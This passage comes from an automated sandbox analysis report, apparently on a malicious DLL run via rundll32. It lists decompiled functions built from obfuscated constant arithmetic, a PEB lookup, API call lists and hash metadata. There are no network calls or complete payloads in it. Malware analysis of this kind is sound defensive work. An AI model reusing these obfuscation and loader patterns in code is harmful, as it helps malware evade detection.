				_v44 = _v44 ^ 0x02c80175;
				_v12 = 0xc44555;
				_v12 = _v12 | 0x8aaf582b;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x8e0d3178;
				_v12 = _v12 ^ 0x9f5e57b0;
				_v36 = 0x15e160;
				_v36 = _v36 << 7;
				_v36 = _v36 * 0x45;
				_v36 = _v36 ^ 0xf2df9ca5;
				_v24 = 0xe11875;
				_v24 = _v24 + 0xffffa15f;
				_v24 = _v24 / _t138;
				_v24 = _v24 ^ 0x000fcfe6;
				_v56 = 0xedc19c;
				_v56 = _v56 | 0x5ad96a0a;
				_v56 = _v56 ^ 0x5af69f46;
				_v52 = 0x112c39;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x00831cf8;
				_v28 = 0xaa6b89;
				_v28 = _v28 >> 4;
				_v28 = _v28 + 0xffff7c23;
				_v28 = _v28 ^ 0x00029c7f;
				_push(_v16);
				_push(_v32);
				_push(0x2b12a4);
				E002B3BF8(_v20, _v28, E002BAB66(_v48, _v8, _v28), _v44, _v12,  &_v592, _a8);
				E002BAE03(_v36, _v24, _v56, _t131);
				return E002BBAB0( &_v592, _v52, _v28);
			}






















                                                                                                                      0x002ce4a3
                                                                                                                      0x002ce4a6
                                                                                                                      0x002ce4a9
                                                                                                                      0x002ce4aa
                                                                                                                      0x002ce4ab
                                                                                                                      0x002ce4b0
                                                                                                                      0x002ce4be
                                                                                                                      0x002ce4c1
                                                                                                                      0x002ce4c4
                                                                                                                      0x002ce4c5
                                                                                                                      0x002ce4c6
                                                                                                                      0x002ce4cd
                                                                                                                      0x002ce4d1
                                                                                                                      0x002ce4d8
                                                                                                                      0x002ce4df
                                                                                                                      0x002ce4e6
                                                                                                                      0x002ce4f1
                                                                                                                      0x002ce4f4
                                                                                                                      0x002ce4fb
                                                                                                                      0x002ce502
                                                                                                                      0x002ce509
                                                                                                                      0x002ce510
                                                                                                                      0x002ce517
                                                                                                                      0x002ce51e
                                                                                                                      0x002ce525
                                                                                                                      0x002ce52c
                                                                                                                      0x002ce530
                                                                                                                      0x002ce537
                                                                                                                      0x002ce53e
                                                                                                                      0x002ce54a
                                                                                                                      0x002ce54b
                                                                                                                      0x002ce550
                                                                                                                      0x002ce557
                                                                                                                      0x002ce55e
                                                                                                                      0x002ce565
                                                                                                                      0x002ce56c
                                                                                                                      0x002ce573
                                                                                                                      0x002ce57a
                                                                                                                      0x002ce581
                                                                                                                      0x002ce585
                                                                                                                      0x002ce58c
                                                                                                                      0x002ce593
                                                                                                                      0x002ce59a
                                                                                                                      0x002ce5a1
                                                                                                                      0x002ce5a5
                                                                                                                      0x002ce5ac
                                                                                                                      0x002ce5b3
                                                                                                                      0x002ce5ba
                                                                                                                      0x002ce5c2
                                                                                                                      0x002ce5c5
                                                                                                                      0x002ce5cc
                                                                                                                      0x002ce5d3
                                                                                                                      0x002ce5df
                                                                                                                      0x002ce5e2
                                                                                                                      0x002ce5e9
                                                                                                                      0x002ce5f0
                                                                                                                      0x002ce5f7
                                                                                                                      0x002ce5fe
                                                                                                                      0x002ce605
                                                                                                                      0x002ce609
                                                                                                                      0x002ce610
                                                                                                                      0x002ce617
                                                                                                                      0x002ce61b
                                                                                                                      0x002ce622
                                                                                                                      0x002ce629
                                                                                                                      0x002ce62c
                                                                                                                      0x002ce62f
                                                                                                                      0x002ce65b
                                                                                                                      0x002ce66a
                                                                                                                      0x002ce688

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 89b69252566239da5d02c6709224186c8c9c457cb955358e373656d3d6d9b835
                                                                                                                      • Instruction ID: 9f4bfaeaf8e53c9f0293d8e746a64ff3e96548865898124047e8efdfdf7ae3a3
                                                                                                                      • Opcode Fuzzy Hash: 89b69252566239da5d02c6709224186c8c9c457cb955358e373656d3d6d9b835
                                                                                                                      • Instruction Fuzzy Hash: 5E5123B2D0131DEBCF14DFA5C94A4DEBBB2FB14318F208198E411B6260D7B91A19CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B68DE Relevance: .1, Instructions: 73COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E002B68DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				void* _t87;
				signed int _t99;
				signed int _t100;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002BCF25(_t87);
				_v8 = 0x73b8de;
				_v8 = _v8 ^ 0x19054fb7;
				_v8 = _v8 << 0xd;
				_v8 = _v8 + 0x3490;
				_v8 = _v8 ^ 0xdee55d26;
				_v20 = 0xe646cf;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x0000515e;
				_v16 = 0xc8864d;
				_v16 = _v16 >> 7;
				_v16 = _v16 + 0xffff7ea5;
				_v16 = _v16 >> 1;
				_v16 = _v16 ^ 0x000d0f10;
				_v16 = 0xf76b6b;
				_v16 = _v16 + 0xffff8d96;
				_v16 = _v16 + 0xa530;
				_v16 = _v16 ^ 0x00f3b26e;
				_v28 = 0xad3635;
				_v28 = _v28 << 4;
				_v28 = _v28 ^ 0x0ad12e90;
				_v28 = 0xa7b230;
				_t99 = 0x21;
				_v28 = _v28 * 0x16;
				_v28 = _v28 ^ 0x0e6a6f58;
				_v28 = 0xa141da;
				_v28 = _v28 / _t99;
				_v28 = _v28 ^ 0x0004c009;
				_v16 = 0x3b52c9;
				_t100 = 0x69;
				_v16 = _v16 / _t100;
				_v16 = _v16 | 0xd3b68a53;
				_v16 = _v16 + 0xffff1b94;
				_v16 = _v16 ^ 0xd3beae71;
				_v12 = 0xce562d;
				_v12 = _v12 << 0x10;
				_v12 = _v12 << 0x10;
				_v12 = _v12 + 0xffff0c4b;
				_v12 = _v12 ^ 0xfffd1cdf;
				_v24 = 0x109fa9;
				_v24 = _v24 >> 8;
				_v24 = _v24 ^ 0x0002830d;
				return E002C40F4(_v28, _v16, _a12, _v12, _v24, E002C5BB3());
			}












                                                                                                                      0x002b68e4
                                                                                                                      0x002b68e7
                                                                                                                      0x002b68ea
                                                                                                                      0x002b68ed
                                                                                                                      0x002b68ef
                                                                                                                      0x002b68f4
                                                                                                                      0x002b68fd
                                                                                                                      0x002b6904
                                                                                                                      0x002b6908
                                                                                                                      0x002b690f
                                                                                                                      0x002b6916
                                                                                                                      0x002b691d
                                                                                                                      0x002b6921
                                                                                                                      0x002b6928
                                                                                                                      0x002b692f
                                                                                                                      0x002b6933
                                                                                                                      0x002b693a
                                                                                                                      0x002b693d
                                                                                                                      0x002b6944
                                                                                                                      0x002b694b
                                                                                                                      0x002b6952
                                                                                                                      0x002b6959
                                                                                                                      0x002b6960
                                                                                                                      0x002b6967
                                                                                                                      0x002b696b
                                                                                                                      0x002b6972
                                                                                                                      0x002b697f
                                                                                                                      0x002b6982
                                                                                                                      0x002b6985
                                                                                                                      0x002b698c
                                                                                                                      0x002b699a
                                                                                                                      0x002b699d
                                                                                                                      0x002b69a4
                                                                                                                      0x002b69ae
                                                                                                                      0x002b69b1
                                                                                                                      0x002b69b4
                                                                                                                      0x002b69bb
                                                                                                                      0x002b69c2
                                                                                                                      0x002b69c9
                                                                                                                      0x002b69d0
                                                                                                                      0x002b69d4
                                                                                                                      0x002b69d8
                                                                                                                      0x002b69df
                                                                                                                      0x002b69e6
                                                                                                                      0x002b69ed
                                                                                                                      0x002b69f1
                                                                                                                      0x002b6a1e

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d2a8de53734b9d3901bc94b6b25c32e81bc309cda1bfd67e32ed41b72a8c3f3f
                                                                                                                      • Instruction ID: eccbb46693d309f408db18eab5f1ad13c69b9b7209565e6944d00fffcaa71f0f
                                                                                                                      • Opcode Fuzzy Hash: d2a8de53734b9d3901bc94b6b25c32e81bc309cda1bfd67e32ed41b72a8c3f3f
                                                                                                                      • Instruction Fuzzy Hash: B531B1B6C0170DEBDF49DFE5D84A4EEBBB1BB10308F208599E611A6251D3B55B54CF80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002CD374 Relevance: .0, Instructions: 2COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002CD374() {

				return  *[fs:0x30];
			}



                                                                                                                      0x002cd37a

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10014DA8 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229registrylibraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                      • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                      • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                      • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                      • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                      • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                      • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                      • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014F68
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                      • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                      • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014FD9
                                                                                                                      • _memset.LIBCMT ref: 10014FF3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                      • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                      • API String ID: 434808117-483790700
                                                                                                                      • Opcode ID: 147489415d7f7f12e4b820da42085f8fd97c08a4daccd4d9168a1bbabc89fc72
                                                                                                                      • Instruction ID: f69531b56b144151f4c46f4c2f1acf85afd3bdedcb4b37807a4dae52f16cbedc
                                                                                                                      • Opcode Fuzzy Hash: 147489415d7f7f12e4b820da42085f8fd97c08a4daccd4d9168a1bbabc89fc72
                                                                                                                      • Instruction Fuzzy Hash: AD817171D002699FDB10DFA5DD44AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002E129 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registryclipboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                      • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                      • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                      • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                      • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                      • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                      • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                      • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                      • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                      • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                      • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                      • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClipboardFormatRegister
                                                                                                                      • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                      • API String ID: 1228543026-2889995556
                                                                                                                      • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                      • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                      • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                      • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003548E Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                      • __mtterm.LIBCMT ref: 100354A0
                                                                                                                        • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                        • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                        • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                        • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                      • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                      • __init_pointers.LIBCMT ref: 10035552
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                      • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                      • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                      • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                      • API String ID: 4287529916-3819984048
                                                                                                                      • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                      • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                      • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                      • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001C915 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                        • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                      • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                      • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                      • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                      • _memset.LIBCMT ref: 1001CA70
                                                                                                                      • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                      • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                      • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                      • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                      • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                      • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                      • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                      • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                      • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                      • API String ID: 867647115-4034971020
                                                                                                                      • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                      • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                      • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                      • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002DB49 Relevance: 28.9, APIs: 19, Instructions: 423stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4128688680-0
                                                                                                                      • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                      • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                      • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                      • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10018B59 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
